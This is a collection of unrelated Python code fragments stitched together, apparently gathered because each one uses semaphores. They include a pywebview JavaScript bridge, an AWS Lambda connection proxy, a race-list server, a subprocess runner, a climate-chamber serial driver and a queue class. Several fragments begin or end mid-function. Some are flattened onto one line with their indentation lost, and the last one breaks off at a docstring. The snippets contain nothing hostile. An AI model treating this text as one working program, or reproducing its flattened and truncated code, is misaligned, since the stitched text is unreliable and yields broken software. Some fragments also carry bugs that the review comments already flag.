        self.webview.load_string(content, 'text/html', 'utf-8', base_uri)

    def evaluate_js(self, script):
        """Run `script` in the page and return its result (str/int/float).

        The result is smuggled out through document.title because the old
        WebKit API offers no direct return channel.
        """
        def _evaluate_js():
            # `code` is resolved from the enclosing scope at call time.
            self.webview.execute_script(code)
            self._js_result_semaphore.release()

        unique_id = uuid1().hex
        # Backup the doc title and store the result in it with a custom prefix
        code = 'oldTitle{0} = document.title; document.title = eval("{1}");'.format(
            unique_id, _escape_string(script))

        self.load_event.wait()
        glib.idle_add(_evaluate_js)
        self._js_result_semaphore.acquire()

        if not gtk.main_level():
            # Webview has been closed, don't proceed
            return None

        # Restore document title and return
        _js_result = self._parse_js_result(self.webview.get_title())
        code = 'document.title = oldTitle{0};'.format(unique_id)
        glib.idle_add(self.webview.execute_script, code)

        return _js_result

    def _parse_js_result(self, result):
        # Best-effort coercion: int, then float, else the raw string.
        try:
            return int(result)
        except ValueError:
            try:
                return float(result)
            except ValueError:
                return result

    def _set_js_api(self):
        def create_bridge():
            # Make the `call` method write the function name and param to the
            # `status` attribute of the JS window, delimited by a unique token.
            # The return value will be passed back to the `return_val` attribute
            # of the bridge by the on_status_change handler.
            code = """
            window.pywebview._bridge.call = function(funcName, param) {{
                window.status = "_{0}_" + funcName + "_{0}_" + param;
                return this.return_val;
            }};""".format(self.js_bridge.uid)

            # Create the `pywebview` JS api object
            self.webview.execute_script(_parse_api_js(self.js_bridge.api))
            self.webview.execute_script(code)
            self.load_event.set()

        glib.idle_add(create_bridge)
tpool = [] while fp.hasNext(): fe = fp.next() benchmarkRun = benchmark if args.outputFile != None: benchmarkRun = benchmark.replace(args.outputFile, outputFolder + args.outputFile+"_"+fe.label+".txt") print "\n\nRunning " + benchmarkRun +\ " with fault:\n" + str(fe) if args.multiThread: sem.acquire() t = Thread(target = StartRegFaultSim, args = (statFolder, benchmarkRun, fe)) tpool.append(t) t.start() else: StartRegFaultSim(statFolder, benchmarkRun, fe) if args.multiThread: for t in tpool: t.join()
class StreamLambdaProxy(AbstractStreamProxy):
    """Invoke a lambda for each connection.

    Each proxied connection hands its socket to the stream server and then
    invokes an AWS Lambda function that connects back and relays traffic.
    Concurrent invocations are bounded by `maxParallelRequests`.
    """

    class Connection(AbstractStreamProxy.Connection):
        """Lightweight host:port record; there is no real socket to close."""

        def __init__(self, host, port):
            self.host = host
            self.port = port

        def close(self):
            pass

        def __str__(self):
            # NOTE(review): assumes `port` is a str here; stream() converts it
            # with int(), so a numeric port would break this concatenation.
            return self.host + ':' + self.port

    def __init__(self, functions, maxParallelRequests, pubKeyFile,
                 streamServer, stats, maxIdleTimeout=1):
        self.__connIdleTimeout = maxIdleTimeout
        self.__functions = functions
        # Caches: function ARN/name -> client, and region -> client.
        self.__functionToClient = {}
        self.__regionToClient = {}
        # Caps the number of in-flight lambda invocations.
        self.__lambdaRateSemaphore = Semaphore(maxParallelRequests)
        self.__lambda = boto3.client('lambda')
        if 'lambda' not in stats.models:
            stats.register_model('lambda', LambdaStatsModel())
        self.__lambdaStats = stats.get_model('lambda')
        self.__streamServer = streamServer

        # Enable encryption
        self.__enableEncryption = False
        if pubKeyFile is not None:
            with open(pubKeyFile, 'rb') as ifs:
                self.__rsaCipher = PKCS1_OAEP.new(RSA.importKey(ifs.read()))
            self.__enableEncryption = True

    def __get_lambda_client(self, function):
        """Get a lambda client from the right region"""
        client = self.__functionToClient.get(function)
        if client is not None:
            return client
        if 'arn:' not in function:
            # using function name in the default region
            client = self.__lambda
            self.__functionToClient[function] = client
        else:
            # Full ARN: derive the region and cache a per-region client.
            region = _get_region_from_arn(function)
            client = self.__regionToClient.get(region)
            if client is None:
                client = boto3.client('lambda', region_name=region)
                self.__regionToClient[region] = client
            self.__functionToClient[function] = client
        return client

    def connect(self, host, port):
        return StreamLambdaProxy.Connection(host, port)

    def stream(self, cliSock, servInfo):
        """Hand `cliSock` to the stream server and invoke a relay lambda."""
        assert isinstance(servInfo, StreamLambdaProxy.Connection)
        # Random id linking this socket to the lambda's callback connection.
        socketId = '%016x' % random.getrandbits(128)
        invokeArgs = {
            'stream': True,
            'socketId': socketId,
            'streamServer': self.__streamServer.publicHostAndPort,
            'host': servInfo.host,
            'port': int(servInfo.port),
            'idleTimeout': self.__connIdleTimeout
        }
        # Spread the load across the configured functions.
        function = random.choice(self.__functions)
        lambdaClient = self.__get_lambda_client(function)
        self.__lambdaRateSemaphore.acquire()
        try:
            self.__streamServer.take_ownership_of_socket(
                socketId, cliSock, self.__connIdleTimeout)
            # The invocation blocks for the lifetime of the proxied stream;
            # its CloudWatch log tail is parsed for billing information.
            with self.__lambdaStats.record() as billingObject:
                invokeResponse = lambdaClient.invoke(
                    FunctionName=function,
                    Payload=json.dumps(invokeArgs),
                    LogType='Tail')
                billingObject.parse_log(invokeResponse['LogResult'])
        finally:
            self.__lambdaRateSemaphore.release()

        if invokeResponse['StatusCode'] != 200:
            logger.error('%s: status=%d',
                         invokeResponse['FunctionError'],
                         invokeResponse['StatusCode'])
        if 'FunctionError' in invokeResponse:
            logger.error('%s error: %s',
                         invokeResponse['FunctionError'],
                         invokeResponse['Payload'].read())
def worker(sem: Semaphore): global count sem.acquire() count += 1 sem.release()
class ThreadManager: def __init__(self, alpha, start_cond, start_point, args=(), kwargs=None, time_sleep=1): self.semaphore = Semaphore(value=alpha) self.start_cond = start_cond self.args = args self.kwargs = kwargs if kwargs is not None else {} self._cont = 0 self._semcont = Semaphore() self.time_sleep = time_sleep def locked_start(*largs, **lkwargs): self.semaphore.acquire() start_point(*largs, **lkwargs) self._semcont.acquire() self._cont -= 1 self._semcont.release() self.semaphore.release() self.start_point = locked_start def start(self): while True: value = self.start_cond() debug( f'ThreadManager.start - Result of start condition is: {value}') if value: debug(f'ThreadManager.start - Acquire General Semaphore') self.semaphore.acquire() debug(f'ThreadManager.start - Try to create Thread') t = Thread(target=self.start_point, args=self.args, kwargs=self.kwargs) debug(f'ThreadManager.start - Acquire Secondary Semaphore') self._semcont.acquire() self._cont += 1 debug( f'ThreadManager.start - Add one to counter of threads. _cont = {self._cont}' ) debug(f'ThreadManager.start - Release Secondary Semaphore') self._semcont.release() debug(f'ThreadManager.start - Start thread') t.start() debug(f'ThreadManager.start - Release General Semaphore') self.semaphore.release() else: self._semcont.acquire() debug(f'ThreadManager.start - Acquire Secondary Semaphore') if self._cont == 0: debug(f'ThreadManager.start - Release Secondary Semaphore') self._semcont.release() debug(f'ThreadManager.start - Finish manager') return debug(f'ThreadManager.start - Release Secondary Semaphore') self._semcont.release() debug( f'ThreadManager.start - Sleeping {self.time_sleep} seconds and try again' ) sleep(self.time_sleep)
#define __DOC4(n1, n2, n3, n4) __doc_##n1##_##n2##_##n3##_##n4 #define __DOC5(n1, n2, n3, n4, n5) __doc_##n1##_##n2##_##n3##_##n4##_##n5 #define __DOC6(n1, n2, n3, n4, n5, n6) __doc_##n1##_##n2##_##n3##_##n4##_##n5##_##n6 #define __DOC7(n1, n2, n3, n4, n5, n6, n7) __doc_##n1##_##n2##_##n3##_##n4##_##n5##_##n6##_##n7 #define DOC(...) __EXPAND(__EXPAND(__CAT2(__DOC, __VA_SIZE(__VA_ARGS__)))(__VA_ARGS__)) #if defined(__GNUG__) #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wunused-variable" #endif ''') output = [] for filename in filenames: thr = ExtractionThread(filename, parameters, output) thr.start() print('Waiting for jobs to finish ..', file=sys.stderr) for i in range(job_count): job_semaphore.acquire() output.sort() for l in output: print(l) print(''' #if defined(__GNUG__) #pragma GCC diagnostic pop #endif ''')
class DataGenerator(object): def __init__( self, data, process_data_item_func, xshape, yshape, \ data_item_selector = choice, \ nthreads = 2, \ pool_size = 1000, \ min_nsamples = 1, \ dtype = 'single' ): assert pool_size >= min_nsamples, \ 'Min. samples must be equal or less than pool_size' assert min_nsamples > 0 and pool_size > 0, \ 'Min. samples and pool size must be positive non-zero numbers' self._data = data self._process_data_item = process_data_item_func self._data_item_selector = data_item_selector #随即选择 self._xshape = xshape self._yshape = yshape self._nthreads = nthreads self._pool_size = pool_size self._min_nsamples = min_nsamples self._dtype = dtype self._count = 0 self._stop = False self._threads = [] self._sem = Semaphore() self._X, self._Y = self._get_buffers(self._pool_size) def _get_buffers(self,N): X = np.empty((N,) + self._xshape, dtype=self._dtype) Y = np.empty((N,) + self._yshape, dtype=self._dtype) return X,Y def _compute_sample(self): d = self._data_item_selector(self._data) return self._process_data_item(d) def _insert_data(self,x,y): self._sem.acquire() if self._count < self._pool_size: self._X[self._count] = x self._Y[self._count] = y self._count += 1 else: idx = randint(0,self._pool_size-1) self._X[idx] = x self._Y[idx] = y self._sem.release() def _run(self): while True: x,y = self._compute_sample() self._insert_data(x,y) if self._stop: break def stop(self): self._stop = True for thread in self._threads: thread.join() def start(self): self._stop = False self._threads = [Thread(target=self._run) for n in range(self._nthreads)] for thread in self._threads: thread.setDaemon(True) thread.start() def get_batch(self,N): # Wait until the buffer was filled with the minimum # number of samples while self._count < self._min_nsamples: sleep(.1) X,Y = self._get_buffers(N) self._sem.acquire() for i in range(N): idx = randint(0,self._count-1) X[i] = self._X[idx] Y[i] = self._Y[idx] self._sem.release() return X,Y
class RLServerList(StopableThread): # {{{
    """Registry of peer race-list servers (Python 2 code).

    Holds our own RLServer record plus a dict of registered peers, persisted
    via cPickle.  `_servers_sem` serializes all access to `_servers`.
    """

    def __init__(self, racelistserver):
        StopableThread.__init__(self, config.server_update)
        self._racelistserver = racelistserver
        # we keep ourself here
        self._rls = RLServer({
            "protocol_version": request.PROTOCOL_VERSION,
            # Server identity: hash of version + name + port.
            "rls_id": sha.new("%s%s%s" % (SERVER_VERSION, config.servername, config.racelistport)).hexdigest(),
            "name": config.servername,
            "port": str(config.racelistport),
            "maxload": str(config.server_maxload),
            "ip": socket.gethostbyname(config.servername)
        })
        self._servers = {}
        self._servers_sem = Semaphore(verbose=1)
        if __debug__:
            log(Log.DEBUG, "_servers_sem = %s" % self._servers_sem )
        self._load()
        self.client = None

    def hasRLServer(self, rls_id):
        # True for our own id as well as any registered peer.
        return self._rls.params['rls_id'] == rls_id or self._servers.has_key(rls_id)

    def getRLServer(self, rls_id):
        """Return the peer record for `rls_id`; raise AUTHERROR if unknown."""
        self._servers_sem.acquire()
        try:
            if not self.hasRLServer(rls_id):
                raise Error(Error.AUTHERROR, "race list server unknown/not logged in")
            return self._servers[rls_id]
        finally:
            self._servers_sem.release()

    def addRLServer(self, rls):
        """Register a peer (no-op if its id is already known)."""
        rls_id = rls.params['rls_id']
        self._servers_sem.acquire()
        try:
            # this also blocks ourself from beeing added; see hasRLServer
            if not self.hasRLServer(rls_id):
                self._servers[rls_id] = rls
        finally:
            self._servers_sem.release()
        self._buildServerListReply()

    def delRLServer(self, rls_id, ip):
        """Unregister a peer, but only when `ip` matches its registration."""
        # check for unknown server
        if not self.hasRLServer(rls_id):
            return
        # check for the same ip, as the server has registered
        rls = self.getRLServer(rls_id)
        if not ip == rls.params['ip']:
            return
        # delete the server from the list
        self._servers_sem.acquire()
        try:
            del self._servers[rls_id]
        finally:
            self._servers_sem.release()
        self._buildServerListReply()

    def getUpdate(self, ip, rls_id, current_load):
        """Record a peer's heartbeat (ip + load); raise AUTHERROR if unknown."""
        self._servers_sem.acquire()
        try:
            if self._servers.has_key(rls_id):
                rls = self._servers[rls_id]
                # update the ip of the racelist server, if it has changed
                if rls.params['ip'] != ip:
                    rls.params['ip'] = ip
                ret = rls.getUpdate(current_load)
            else:
                raise Error(Error.AUTHERROR, 'unknown server')
        finally:
            self._servers_sem.release()
        # with the update comes also the current load so we rebuild the lists
        self._buildServerListReply()
        return ret

    def addRequest(self, values):
        """Broadcast a request to every registered peer."""
        self._servers_sem.acquire()
        try:
            for server in self._servers.values():
                server.addRequest(values)
        finally:
            self._servers_sem.release()

    def _load(self):
        """Restore the persisted server dict; keep an empty one on failure."""
        filename = config.file_serverlist
        log(Log.INFO, "load the server list from file '%s'" % (filename))
        try:
            try:
                f = open(filename, "r")
                self._servers = cPickle.load(f)
            finally:
                # Best-effort close; `f` may be unbound if open() failed.
                try:
                    f.close()
                except:
                    pass
        except Exception, e:
            log(Log.WARNING, "failed to load server list from file '%s': %s" % (filename, e))
        self._buildServerListReply()
def exec_proc(args: Union[str, Iterable[str]],
              on_stdout: Callable[[bytes], None] = None,
              on_stderr: Callable[[bytes], None] = None,
              stderr_to_stdout: bool = False,
              buffer_size: int = 16 * 1024,
              ctrl_c_timeout: float = 3,
              **kwargs) -> Generator[subprocess.Popen, None, None]:
    """
    Execute an external program within a context.

    Args:
        args: Command line or arguments of the program.
            If it is a command line, then `shell = True` will be set.
        on_stdout: Callback for capturing stdout.
        on_stderr: Callback for capturing stderr.
        stderr_to_stdout: Whether or not to redirect stderr to stdout?
            If specified, `on_stderr` will be ignored.
        buffer_size: Size of buffers for reading from stdout and stderr.
        ctrl_c_timeout: Seconds to wait for the program to respond to
            CTRL+C signal.
        \\**kwargs: Other named arguments passed to :func:`subprocess.Popen`.

    Yields:
        The process object.
    """
    # check the arguments
    if stderr_to_stdout:
        kwargs['stderr'] = subprocess.STDOUT
        on_stderr = None
    if on_stdout is not None:
        kwargs['stdout'] = subprocess.PIPE
    if on_stderr is not None:
        kwargs['stderr'] = subprocess.PIPE

    # output reader
    def reader_func(fd, action):
        # Pump `fd` into `action` until EOF or the stop flag is raised.
        while not stopped[0]:
            buf = os.read(fd, buffer_size)
            if not buf:
                break
            action(buf)

    def make_reader_thread(fd, action):
        # Always release `reader_sem` so the startup rendezvous below
        # cannot deadlock even if thread creation fails.
        try:
            th = Thread(target=reader_func, args=(fd, action))
            th.daemon = True
            th.start()
            return th
        finally:
            reader_sem.release()

    reader_sem = Semaphore()
    # One release per reader thread is expected before we proceed.
    expected_sem_target = int(on_stdout is not None) + int(
        on_stderr is not None)

    # internal flags
    stopped = [False]   # mutable cell shared with the reader threads

    # launch the process
    stdout_thread = None  # type: Thread
    stderr_thread = None  # type: Thread
    if isinstance(args, (str, bytes)):
        shell = True
    else:
        args = tuple(args)
        shell = False

    # Start the child in its own session so the whole group can be signalled.
    if sys.platform != 'win32':
        kwargs.setdefault('preexec_fn', os.setsid)
    proc = subprocess.Popen(args, shell=shell, **kwargs)

    # patch the kill() to ensure the whole process group would be killed,
    # in case `shell = True`.
    def my_kill(self, ctrl_c_timeout=ctrl_c_timeout):
        recursive_kill(self, ctrl_c_timeout=ctrl_c_timeout)

    proc.kill = types.MethodType(my_kill, proc)

    try:
        if on_stdout is not None:
            stdout_thread = make_reader_thread(proc.stdout.fileno(), on_stdout)
        if on_stderr is not None:
            stderr_thread = make_reader_thread(proc.stderr.fileno(), on_stderr)
        # Wait until every reader thread has been launched.
        for i in range(expected_sem_target):
            reader_sem.acquire()

        try:
            yield proc
        except KeyboardInterrupt:  # pragma: no cover
            if proc.poll() is None:
                # Wait for a while to ensure the program has properly dealt
                # with the interruption signal. This will help to capture
                # the final output of the program.
                # TODO: use signal.signal instead for better treatment
                _ = timed_wait_proc(proc, 1)

    finally:
        if proc.poll() is None:
            proc.kill()

        # gracefully stop the reader without setting `stopped = True` for
        # a couple of time, so as to ensure the remaining content are read out.
        # NOTE(review): Thread.join takes a timeout in *seconds* (3000 is
        # ~50 min) and never raises TimeoutError, so this except is dead
        # code -- likely meant join(3); verify intent before changing.
        for th in (stdout_thread, stderr_thread):
            if th is not None:
                try:
                    th.join(3000)
                except TimeoutError:
                    pass

        # Force setting the stopped flag, and wait for the reader threads
        # to exit.
        stopped[0] = True
        for th in (stdout_thread, stderr_thread):
            if th is not None:
                th.join()

        # Ensure all the pipes are closed.
        for f in (proc.stdout, proc.stderr, proc.stdin):
            if f is not None:
                try:
                    f.close()
                except Exception:  # pragma: no cover
                    getLogger(__name__).info(
                        'Failed to close a sub-process pipe.', exc_info=True)
class KTHS_415BS:
    """Serial-port driver for a KTHS-415BS environmental test chamber.

    Commands follow the 'STX,0,1,<op>,...,END' protocol; successful replies
    echo 'STX,1,0,<op>,END'.  A semaphore serializes all port access.

    NOTE(review): pyserial's `read_until` expects a *bytes* terminator, but
    every call below passes the str 'END' -- verify this works with the
    pyserial version in use.
    """

    def __init__(self, serial_port: str):
        logging.basicConfig(level=logging.DEBUG)
        self.port = serial.Serial(serial_port,
                                  baudrate=19200,
                                  parity=serial.PARITY_NONE,
                                  timeout=1)
        # Status codes as reported in the 'A' (status) reply.
        self.status_dict = {'0': "STOPPED", '1': "RUNNING", '2': "RESERVED"}
        self.pgm_list = list()   # program names cached by list_all_pgm()
        self.pv = dict()         # latest process values parsed by get_status()
        self.sem = Semaphore()   # serializes serial-port transactions
        self.power_status = self.check_power_status()

    def check_power_status(self):
        """Probe the controller; True when the status query gets a real reply."""
        self.sem.acquire()
        self.port.write('STX,0,1,A,END'.encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        # A reply shorter than ~10 chars means no/garbled response.
        if len(re) <= 10:
            return False
        return True

    def get_status(self):
        """Query the chamber and refresh self.pv with all process values."""
        self.sem.acquire()
        self.port.write('STX,0,1,A,END'.encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("check status return:\n{}".format(re))
        # Strip the 'STX,1,0,A' prefix and the trailing 'END'.
        re = re.split(",")[4:-1]
        self.pv['type'], self.pv['status'], self.pv['temperature'], self.pv[
            'humidity'], self.pv['temp_sv'], self.pv['humi_sv'] = re[0:6]
        self.pv['pgm_name'], self.pv['cycle'], self.pv['step'], self.pv[
            'hour'], self.pv['min'], self.pv['error'] = re[6:]
        # Translate the numeric status code into a readable word.
        self.pv['status'] = self.status_dict[self.pv['status']]
        logging.debug("Current Running Status:{}\n".format(self.pv['status']))
        logging.debug("Current Error Status:{}\n".format(self.pv['error']))
        return True

    def delete_pgm(self, pgm_name: str):
        """Delete a stored program; True on the expected acknowledgement."""
        self.sem.acquire()
        self.port.write('STX,0,1,D,{},END'.format(pgm_name).encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("delete program return:\n{}".format(re))
        return re == 'STX,1,0,D,END'

    def stop(self):
        """Stop the currently running program."""
        self.sem.acquire()
        self.port.write('STX,0,1,E,END'.encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("stop return:\n{}".format(re))
        return re == 'STX,1,0,E,END'

    def pgm_jump_section(self, section):
        """Jump the running program to `section` ('N' means next step)."""
        self.sem.acquire()
        self.port.write('STX,0,1,J,{},END'.format(section).encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("Jump section {} return:\n{}".format(section, re))
        return re == 'STX,1,0,J,END'

    def pgm_jump_next(self):
        """pgm_jump_next() funtion will jump by the next step, which means
        machine will jump from N to N+2 step and bypass N+1 step"""
        return self.pgm_jump_section('N')

    def list_all_pgm(self):
        """Return the list of stored program names, or None when empty."""
        self.sem.acquire()
        self.port.write('STX,0,1,O,END'.encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("Get all pgm return:\n{}".format(re))
        # Field 4 carries the program count, names follow it.
        pgm_count = int(re.split(',')[4])
        if pgm_count >= 1:
            logging.debug("PGM count:{}".format(pgm_count))
            self.pgm_list = re.split(',')[5:-1]
            return self.pgm_list
        else:
            logging.debug("PGM count zero!")
            return None

    def load_pgm(self, pgm_name: str):
        """Load a program into the controller (only while STOPPED)."""
        self.get_status()
        if self.pv['status'] == 'STOPPED':
            self.sem.acquire()
            self.port.write('STX,0,1,L,{},END'.format(pgm_name).encode())
            re = self.port.read_until('END').decode().replace(" ", "")
            self.sem.release()
            logging.debug("Load program {} return:\n{}".format(pgm_name, re))
            return re == 'STX,1,0,L,END'
        else:
            return False

    def rename_pgm(self, src_pgm: str, dst_pgm: str):
        """Rename a stored program from `src_pgm` to `dst_pgm`."""
        self.sem.acquire()
        self.port.write('STX,0,1,N,{},{},END'.format(src_pgm, dst_pgm).encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("Rename program {} to {} return:\n{}".format(
            src_pgm, dst_pgm, re))
        return re == 'STX,1,0,N,END'

    def view_pgm(self, pgm_name: str):
        """Read back a stored program; returns a dict with its steps."""
        self.sem.acquire()
        self.port.write('STX,0,1,R,{},END'.format(pgm_name).encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("View program {} return:\n{}".format(pgm_name, re))
        re = re.split(',')[5:-1]
        pgm_content = dict()
        pgm_content['cycle'], pgm_content['step'], pgm_content[
            'high_limit'], pgm_content['low_limit'] = re[:4]
        steps = re[4:]
        # chunk the steps in to sections by size 8
        pgm_content['steps'] = [
            steps[x * 8:(x + 1) * 8]
            for x in range(0, int(pgm_content['step']))
        ]
        return pgm_content

    def run_loaded_pgm(self):
        """Start the already-loaded program (only while STOPPED)."""
        self.get_status()
        if self.pv['status'] == 'STOPPED':
            self.sem.acquire()
            self.port.write('STX,0,1,T,END'.encode())
            re = self.port.read_until('END').decode().replace(" ", "")
            self.sem.release()
            logging.debug("Run loaded program return:\n{}".format(re))
            return re == 'STX,1,0,T,END'
        else:
            logging.warning(
                "Can only run loaded program when machine status is stopped!")
            return False

    def execute_pgm(self, pgm_name: str):
        """Load and start `pgm_name` in one command (only while STOPPED)."""
        self.get_status()
        if self.pv['status'] == 'STOPPED':
            self.sem.acquire()
            self.port.write('STX,0,1,S,{},END'.format(pgm_name).encode())
            re = self.port.read_until('END').decode().replace(" ", "")
            self.sem.release()
            logging.debug("Execute program return:\n{}".format(re))
            return re == 'STX,1,0,S,END'
        else:
            logging.warning(
                "Can only execute program when machine status is stopped!")
            return False

    def write_pgm(self, pgm_name: str, target_temp: int, target_humi: int,
                  target_hour: int, target_min: int):
        """due to function parameter complication,this function only support
        1 target temperature and 1 target humidity in 2 steps,low limit and
        high limit setting not working,automatic set according to your temp
        setting,so we add two steps with 150 and -50C to set the limit range
        to -50~150"""
        cmd_str = 'STX,0,1,W,{pgm_name},1,4,{high_limit},{low_limit},{target_temp},' \
                  '{target_humi},0,0,0,0,0,0,{target_temp},{target_humi},{target_hour},' \
                  '{target_min},0,0,0,0,' \
                  '150,0,0,1,0,0,0,0,-50,0,0,1,0,0,0,0,END'.format(pgm_name=pgm_name,
                                                                   target_temp=target_temp,
                                                                   high_limit=100,
                                                                   low_limit=0,
                                                                   target_humi=target_humi,
                                                                   target_hour=target_hour,
                                                                   target_min=target_min)
        self.sem.acquire()
        self.port.write(cmd_str.encode())
        re = self.port.read_until('END').decode().replace(" ", "")
        self.sem.release()
        logging.debug("Write Program return:\n{}".format(re))
        return re == "STX,1,0,W,END"

    def close(self):
        """Release the serial port."""
        self.port.close()
class RaceList(StopableThread): # {{{ STATE_START = 1 STATE_RUN = 2 STATE_STOP = 3 def __init__(self, racelistserver): StopableThread.__init__(self,config.racelist_clean_interval) self._racelistserver = racelistserver self._users = {} self._usersuniqids = {} self._races = {} self._racesbroadcasts = {} self._reqfull = [] self._state = RaceList.STATE_START self._users_sem = Semaphore(verbose=1) self._races_sem = Semaphore(verbose=1) if __debug__: log(Log.DEBUG, "_users_sem = %s" % self._users_sem ) log(Log.DEBUG, "_races_sem = %s" % self._races_sem ) self._load() def hasUser(self, client_id): return self._users.has_key(client_id) def hasRace(self, server_id): return self._races.has_key(server_id) def addUser(self,user): self._users_sem.acquire() try: client_id = user.params['client_id'] if not self.hasUser(client_id): self._users[client_id] = user self._usersuniqids[user.params['client_uniqid']] = user else: raise Error(Error.REQUESTERROR, "user already registered") finally: self._users_sem.release() def removeUser(self,client_id): self._users_sem.acquire() self._races_sem.acquire() try: self._removeUser(client_id) finally: self._races_sem.release() self._users_sem.release() def _removeUser(self,client_id): if self.hasUser(client_id): if self._usersuniqids.has_key(self._users[client_id].params['client_uniqid']): del self._usersuniqids[self._users[client_id].params['client_uniqid']] del self._users[client_id] for race in self._races.values(): race.removeDriver(client_id) self._buildRaceListAsReply() def getUser(self,client_id): self._users_sem.acquire() try: if not self.hasUser(client_id): raise Error(Error.AUTHERROR, "user unknown/not logged in") ret = self._users[client_id] ret.setActive() return ret finally: self._users_sem.release() def getUserByUniqId(self,client_uniqid): if self._usersuniqids.has_key(client_uniqid): return self._usersuniqids[client_uniqid] return None def addRace(self,race): self._races_sem.acquire() try: if not 
self.hasRace(race.params['server_id']): self._races[race.params['server_id']] = race self._racesbroadcasts[race.params['broadcastid']] = race self._buildRaceListAsReply() finally: self._races_sem.release() def removeRace(self,server_id,client_id): self._races_sem.acquire() try: self._removeRace(server_id, client_id) finally: self._races_sem.release() def _removeRace(self,server_id,client_id): if not self.hasRace(server_id): return if self._races[server_id].params['client_id']!=client_id: raise Error(Error.AUTHERROR, "authorization required") broadcastid = self._races[server_id].params['broadcastid'] if self._racesbroadcasts.has_key(broadcastid): del self._racesbroadcasts[broadcastid] del self._races[server_id] self._buildRaceListAsReply() def driverJoinRace(self,server_id,driver): self._races_sem.acquire() try: for race in self._races.values(): race.removeDriver(driver.params['client_id']) if self.hasRace(server_id): self._races[server_id].addDriver(driver) self._buildRaceListAsReply() finally: self._races_sem.release() def driverLeaveRace(self,server_id,client_id): self._races_sem.acquire() try: if self.hasRace(server_id): self._races[server_id].removeDriver(client_id) self._buildRaceListAsReply() finally: self._races_sem.release() def _buildRaceListAsReply(self): self.reqfull = [] for race in self._races.values(): if race.params['visible']: self.reqfull.append(race.getRaceAsReply()) for driver in race.drivers.values(): self.reqfull.append(driver.getDriverAsReply()) def getRaceListAsReply(self): self._races_sem.acquire() try: return self.reqfull finally: self._races_sem.release() def updateRaceViaBroadcast(self, params): self._users_sem.acquire() self._races_sem.acquire() try: broadcastid = "%s:%s" % (params['ip'], params['joinport']) race = None if not self._racesbroadcasts.has_key(broadcastid): for r in self._races.values(): if r.params['broadcastname'] == params['name']: # we found by name - update the ip and broadcast race = r old_broadcast_id = 
race.params['broadcastid'] del self._racesbroadcasts[old_broadcast_id] race.params['ip'] = params['ip'] race.genBroadcastId() self._racesbroadcasts[race.params['broadcastid']] = race else: race = self._racesbroadcasts[broadcastid] if race is not None: race = self._racesbroadcasts[broadcastid] race.updateRaceViaBroadcast( params['players'], params['maxplayers'], params['racetype'], params['trackdir'], params['sessiontype'], params['sessionleft'] ) self._buildRaceListAsReply() # set the starting user active so it gets # distributed for sure and assures, that a # race can be started on the other racelists client_id = race.params['client_id'] if self._users.has_key(client_id): self._users[client_id].setActive() finally: self._races_sem.release() self._users_sem.release() def _run(self): """lurks behind the scenes and cleans the._races and the._users""" # nothing do until we hit the RUN state if self._state!=RaceList.STATE_RUN: return currenttime = time() usercount = 0 userdelcount = 0 racecount = 0 racedelcount = 0 raceinvisiblecount = 0 self._users_sem.acquire() self._races_sem.acquire() try: for server_id in self._races.keys(): racecount = racecount + 1 # set the client, which started the race, active client_id = self._races[server_id].params['client_id'] if self._users.has_key(client_id): self._users[client_id].setActive() if self._racelistserver._request_count: if self._races[server_id].params['visible'] and self._races[server_id].checkTimeout(currenttime): # soft timeout removes it from display if __debug__: log(Log.DEBUG, "setting race %s invisible" % server_id ) self._races[server_id].params['visible'] = 0 raceinvisiblecount = raceinvisiblecount + 1 self._buildRaceListAsReply() elif self._races[server_id].checkTimeout(currenttime,config.race_timeout_hard): # hard timeout deletes the race if __debug__: log(Log.DEBUG, "removing race %s" % server_id ) racedelcount = racedelcount + 1 self._removeRace(server_id, self._races[server_id].params['client_id']) for 
client_id in self._users.keys(): usercount = usercount + 1 if self._users[client_id].checkTimeout(currenttime): if __debug__: log(Log.DEBUG, "removing user %s" % client_id ) userdelcount = userdelcount + 1 self._removeUser(client_id) finally: self._races_sem.release() self._users_sem.release() log(log.INFO, "cleanup: %d/%d users; %d/%d/%d races" % (userdelcount,usercount,racedelcount,raceinvisiblecount,racecount)) self._save() def _join(self): self._state = RaceList.STATE_STOP self._save() def _save(self): """stores the current racelist in the given file""" filename = config.file_racelist self._users_sem.acquire() self._races_sem.acquire() try: try: try: outf = open(filename, "w") cPickle.dump(self._users, outf ) cPickle.dump(self._races, outf ) finally: try: outf.close() except: log(Log.WARNING,"failed to close out file for racelist: %s" % (e) ) pass except Exception, e: log(Log.WARNING,"failed to save racelist state to file '%s': %s" % (filename,e) ) return finally: self._races_sem.release() self._users_sem.release() log(Log.INFO, "stored racelist to file '%s'" % filename ) def _load(self): """loads the racelist from the given file""" filename = config.file_racelist log(Log.INFO, "load racelist from file '%s'" % filename ) self._users_sem.acquire() self._races_sem.acquire() try: try: try: inf = open(filename, "r") self._users = cPickle.load(inf) self._races = cPickle.load(inf) self._racesbroadcasts = {} for race in self._races.values(): self._racesbroadcasts[race.params['broadcastid']] = race if self._users.has_key(race.params['client_id']): self._users[race.params['client_id']].setActive() # XXX update the racelist race.genBroadcastId() self._usersuniqids = {} for user in self._users.values(): self._usersuniqids[user.params['client_uniqid']] = user finally: try: inf.close() except: pass except Exception,e: log(Log.WARNING, "failed to load racelist state from file '%s': %s" % (filename, e) ) self._buildRaceListAsReply() finally:
class LooperQueue:
    """
    The :class:`LooperQueue` provides an encapsulation of a queue, semaphore,
    and lock combination to be utilized and passed as one object.  Makes it
    easy to share the queue, semaphore, and lock between the
    :class:`LooperPool` and the :class:`Looper` threaded objects.
    """

    def __init__(self):
        self._queue = []                            # FIFO of pending work packets
        self._queue_available = Semaphore(value=0)  # one permit per queued packet
        self._queue_lock = RLock()                  # guards _queue / _queue_shutdown
        self._queue_shutdown = None                 # becomes a Semaphore once shutdown starts
        return

    def push_work(self, packet: object):
        """
        Pushes a work packet for the :class:`LooperPool` threads to work on.

        :param packet: the work item to queue.
        :returns: the number of packets queued after the push.
        :raises AKitLooperError: if the queue has been shut down.
        """
